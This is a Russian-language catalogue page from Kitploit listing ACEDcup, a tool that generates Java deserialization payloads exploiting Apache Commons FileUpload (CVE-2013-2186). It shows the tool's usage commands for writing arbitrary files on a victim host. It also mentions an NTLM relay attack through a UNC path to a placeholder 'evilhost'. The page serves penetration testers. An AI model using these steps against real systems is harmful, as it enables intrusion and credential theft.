Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ACEDcup — Генератор пейлоадов для атаки с использованием бинарной десериализации Java через Commons FileUpload (CVE-2013-2186) | Kitploit
Инструменты/GitHubGitHub/grrrdog/acedcup
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubgrrrdog/acedcup

ACEDcup

Генератор пейлоадов для атаки с использованием бинарной десериализации Java через Commons FileUpload (CVE-2013-2186)

Репозиторий
371410 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ACEDcup

Инструмент ACEDcup — генератор полезной нагрузки для атаки на бинарную десериализацию Java (ACED)

Для Apache Commons FileUpload версии <= 1.3 (CVE-2013-2186) и Oracle JDK версии < 7u40

Атака работает даже на более новых версиях библиотеки или Java. Мы можем загрузить любое содержимое в любую директорию, но мы не можем контролировать имя файла (что-то вроде upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) в этой ситуации. Однако в некоторых случаях это может быть полезно.

Также мы можем выполнить NTLM-relay/sniffing атаку (используя \\evilhost\any\path), если ваша цель работает на Windows OS.

Использование

root@kitploit:~
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

Пример

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

Скачать инструмент